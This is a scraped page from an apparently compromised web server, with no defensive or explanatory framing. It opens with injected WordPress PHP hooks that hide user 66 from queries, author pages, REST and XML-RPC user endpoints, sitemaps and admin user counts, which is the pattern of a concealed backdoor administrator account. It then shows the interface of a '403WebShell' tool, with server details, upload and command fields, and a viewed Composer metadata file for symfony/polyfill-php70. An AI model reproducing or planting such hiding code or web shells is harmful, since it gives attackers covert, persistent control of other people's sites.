add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-symfony~polyfill-php70.json
{"minified":"composer/2.0","packages":{"symfony/polyfill-php70":[{"name":"symfony/polyfill-php70","description":"Symfony polyfill backporting some PHP 7.0+ features to lower PHP versions","keywords":["compatibility","portable","polyfill","shim"],"homepage":"https://symfony.com","version":"v1.20.0","version_normalized":"1.20.0.0","license":["MIT"],"authors":[{"name":"Nicolas Grekas","email":"p@tchwork.com"},{"name":"Symfony Community","homepage":"https://symfony.com/contributors"}],"source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"5f03a781d984aae42cebd18e7912fa80f02ee644"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/5f03a781d984aae42cebd18e7912fa80f02ee644","type":"zip","shasum":"","reference":"5f03a781d984aae42cebd18e7912fa80f02ee644"},"type":"metapackage","support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.20.0"},"funding":[{"url":"https://symfony.com/sponsor","type":"custom"},{"url":"https://github.com/fabpot","type":"github"},{"url":"https://tidelift.com/funding/github/packagist/symfony/symfony","type":"tidelift"}],"time":"2020-10-23T14:02:19+00:00","extra":{"branch-alias":{"dev-main":"1.20-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}},"require":{"php":">=7.1"}},{"version":"v1.19.0","version_normalized":"1.19.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"3fe414077251a81a1b15b1c709faf5c2fbae3d4e"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/3fe414077251a81a1b15b1c709faf5c2fbae3d4e","type":"zip","shasum":"","reference":"3fe414077251a81a1b15b1c709faf5c2fbae3d4e"},"type":"library","support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.19.0"},"time":"2020-10-23T09:01:57+00:00","autoload":{"files":["bootstrap.php"],"psr-4":{"Symfony\\Polyfill\\Php70\\":""},"classmap":["Resources/stubs"]},"extra":{"branch-alias":{"dev-main":"1.19-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}},"require":{"php":">=5.3.3","paragonie/random_compat":"~1.0|~2.0|~9.99"}},{"version":"v1.18.1","version_normalized":"1.18.1.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"0dd93f2c578bdc9c72697eaa5f1dd25644e618d3"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/0dd93f2c578bdc9c72697eaa5f1dd25644e618d3","type":"zip","shasum":"","reference":"0dd93f2c578bdc9c72697eaa5f1dd25644e618d3"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"time":"2020-07-14T12:35:20+00:00","extra":{"branch-alias":{"dev-master":"1.18-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.18.0","version_normalized":"1.18.0.0","support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.18.0"}},{"version":"v1.17.1","version_normalized":"1.17.1.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"471b096aede7025bace8eb356b9ac801aaba7e2d"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/471b096aede7025bace8eb356b9ac801aaba7e2d","type":"zip","shasum":"","reference":"471b096aede7025bace8eb356b9ac801aaba7e2d"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.17.1"},"time":"2020-06-06T08:46:27+00:00","extra":{"branch-alias":{"dev-master":"1.17-dev"},"thanks":{"name":"symfony/polyfill","url":"https://github.com/symfony/polyfill"}}},{"version":"v1.17.0","version_normalized":"1.17.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"82225c2d7d23d7e70515496d249c0152679b468e"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/82225c2d7d23d7e70515496d249c0152679b468e","type":"zip","shasum":"","reference":"82225c2d7d23d7e70515496d249c0152679b468e"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"time":"2020-05-12T16:47:27+00:00","extra":{"branch-alias":{"dev-master":"1.17-dev"}}},{"version":"v1.16.0","version_normalized":"1.16.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"6cc55bd2a085dbe05b4122c1987a82897b8da419"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/6cc55bd2a085dbe05b4122c1987a82897b8da419","type":"zip","shasum":"","reference":"6cc55bd2a085dbe05b4122c1987a82897b8da419"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.16.0"},"time":"2020-05-02T14:56:09+00:00","extra":{"branch-alias":{"dev-master":"1.16-dev"}}},{"version":"v1.15.0","version_normalized":"1.15.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"2a18e37a489803559284416df58c71ccebe50bf0"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/2a18e37a489803559284416df58c71ccebe50bf0","type":"zip","shasum":"","reference":"2a18e37a489803559284416df58c71ccebe50bf0"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"funding":[],"time":"2020-02-27T09:26:54+00:00","extra":{"branch-alias":{"dev-master":"1.15-dev"}}},{"version":"v1.14.0","version_normalized":"1.14.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"419c4940024c30ccc033650373a1fe13890d3255"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/419c4940024c30ccc033650373a1fe13890d3255","type":"zip","shasum":"","reference":"419c4940024c30ccc033650373a1fe13890d3255"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.14.0"},"time":"2020-01-13T11:15:53+00:00","extra":{"branch-alias":{"dev-master":"1.14-dev"}},"funding":"__unset"},{"version":"v1.13.2","version_normalized":"1.13.2.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"af23c7bb26a73b850840823662dda371484926c4"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/af23c7bb26a73b850840823662dda371484926c4","type":"zip","shasum":"","reference":"af23c7bb26a73b850840823662dda371484926c4"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"time":"2019-11-27T13:56:44+00:00","extra":{"branch-alias":{"dev-master":"1.13-dev"}}},{"version":"v1.13.1","version_normalized":"1.13.1.0"},{"version":"v1.13.0","version_normalized":"1.13.0.0","support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.13.0"}},{"version":"v1.12.0","version_normalized":"1.12.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"54b4c428a0054e254223797d2713c31e08610831"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/54b4c428a0054e254223797d2713c31e08610831","type":"zip","shasum":"","reference":"54b4c428a0054e254223797d2713c31e08610831"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.12.0"},"time":"2019-08-06T08:03:45+00:00","extra":{"branch-alias":{"dev-master":"1.12-dev"}}},{"version":"v1.11.0","version_normalized":"1.11.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"bc4858fb611bda58719124ca079baff854149c89"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/bc4858fb611bda58719124ca079baff854149c89","type":"zip","shasum":"","reference":"bc4858fb611bda58719124ca079baff854149c89"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"time":"2019-02-06T07:57:58+00:00","extra":{"branch-alias":{"dev-master":"1.11-dev"}}},{"version":"v1.10.0","version_normalized":"1.10.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"6b88000cdd431cd2e940caa2cb569201f3f84224"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/6b88000cdd431cd2e940caa2cb569201f3f84224","type":"zip","shasum":"","reference":"6b88000cdd431cd2e940caa2cb569201f3f84224"},"time":"2018-09-21T06:26:08+00:00","extra":{"branch-alias":{"dev-master":"1.9-dev"}}},{"version":"v1.9.0","version_normalized":"1.9.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"1e24b0c4a56d55aaf368763a06c6d1c7d3194934"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/1e24b0c4a56d55aaf368763a06c6d1c7d3194934","type":"zip","shasum":"","reference":"1e24b0c4a56d55aaf368763a06c6d1c7d3194934"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/v1.9.0"},"time":"2018-08-06T14:22:27+00:00"},{"version":"v1.8.0","version_normalized":"1.8.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"77454693d8f10dd23bb24955cffd2d82db1007a6"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/77454693d8f10dd23bb24955cffd2d82db1007a6","type":"zip","shasum":"","reference":"77454693d8f10dd23bb24955cffd2d82db1007a6"},"support":{"source":"https://github.com/symfony/polyfill-php70/tree/master"},"time":"2018-04-26T10:06:28+00:00","extra":{"branch-alias":{"dev-master":"1.8-dev"}},"require":{"php":">=5.3.3","paragonie/random_compat":"~1.0|~2.0"}},{"version":"v1.7.0","version_normalized":"1.7.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"3532bfcd8f933a7816f3a0a59682fc404776600f"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/3532bfcd8f933a7816f3a0a59682fc404776600f","type":"zip","shasum":"","reference":"3532bfcd8f933a7816f3a0a59682fc404776600f"},"time":"2018-01-30T19:27:44+00:00","extra":{"branch-alias":{"dev-master":"1.7-dev"}}},{"version":"v1.6.0","version_normalized":"1.6.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"0442b9c0596610bd24ae7b5f0a6cdbbc16d9fcff"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/0442b9c0596610bd24ae7b5f0a6cdbbc16d9fcff","type":"zip","shasum":"","reference":"0442b9c0596610bd24ae7b5f0a6cdbbc16d9fcff"},"time":"2017-10-11T12:05:26+00:00","extra":{"branch-alias":{"dev-master":"1.6-dev"}}},{"version":"v1.5.0","version_normalized":"1.5.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"b6482e68974486984f59449ecea1fbbb22ff840f"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/b6482e68974486984f59449ecea1fbbb22ff840f","type":"zip","shasum":"","reference":"b6482e68974486984f59449ecea1fbbb22ff840f"},"time":"2017-06-14T15:44:48+00:00","extra":{"branch-alias":{"dev-master":"1.5-dev"}}},{"version":"v1.4.0","version_normalized":"1.4.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"032fd647d5c11a9ceab8ee8747e13b5448e93874"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/032fd647d5c11a9ceab8ee8747e13b5448e93874","type":"zip","shasum":"","reference":"032fd647d5c11a9ceab8ee8747e13b5448e93874"},"time":"2017-06-09T14:24:12+00:00","extra":{"branch-alias":{"dev-master":"1.4-dev"}}},{"version":"v1.3.1","version_normalized":"1.3.1.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"3ef55965136f1df57e2cf1e893d91d3bc1516822"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/3ef55965136f1df57e2cf1e893d91d3bc1516822","type":"zip","shasum":"","reference":"3ef55965136f1df57e2cf1e893d91d3bc1516822"},"time":"2017-06-09T14:07:13+00:00","extra":{"branch-alias":{"dev-master":"1.3-dev"}}},{"version":"v1.3.0","version_normalized":"1.3.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"13ce343935f0f91ca89605a2f6ca6f5c2f3faac2"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/13ce343935f0f91ca89605a2f6ca6f5c2f3faac2","type":"zip","shasum":"","reference":"13ce343935f0f91ca89605a2f6ca6f5c2f3faac2"},"time":"2016-11-14T01:06:16+00:00"},{"version":"v1.2.0","version_normalized":"1.2.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"a42f4b6b05ed458910f8af4c4e1121b0101b2d85"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/a42f4b6b05ed458910f8af4c4e1121b0101b2d85","type":"zip","shasum":"","reference":"a42f4b6b05ed458910f8af4c4e1121b0101b2d85"},"time":"2016-05-18T14:26:46+00:00","extra":{"branch-alias":{"dev-master":"1.2-dev"}}},{"version":"v1.1.1","version_normalized":"1.1.1.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"386c1be9cad3ab531425211919e78c37971be4ce"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/386c1be9cad3ab531425211919e78c37971be4ce","type":"zip","shasum":"","reference":"386c1be9cad3ab531425211919e78c37971be4ce"},"time":"2016-01-28T22:42:02+00:00","extra":{"branch-alias":{"dev-master":"1.1-dev"}},"require":{"php":">=5.3.3","paragonie/random_compat":"~1.0"}},{"version":"v1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"8428ceddbbaf102f2906769a8ef2438220c5cb95"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/8428ceddbbaf102f2906769a8ef2438220c5cb95","type":"zip","shasum":"","reference":"8428ceddbbaf102f2906769a8ef2438220c5cb95"},"time":"2016-01-25T08:44:42+00:00"},{"version":"v1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/symfony/polyfill-php70.git","type":"git","reference":"7f7f3c9c2b9f17722e0cd64fdb4f957330c53146"},"dist":{"url":"https://api.github.com/repos/symfony/polyfill-php70/zipball/7f7f3c9c2b9f17722e0cd64fdb4f957330c53146","type":"zip","shasum":"","reference":"7f7f3c9c2b9f17722e0cd64fdb4f957330c53146"},"time":"2015-11-04T20:28:58+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}}},{"version":"v1.0.0","version_normalized":"1.0.0.0"}]},"security-advisories":[],"last-modified":"Sun, 31 Mar 2024 12:00:02 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit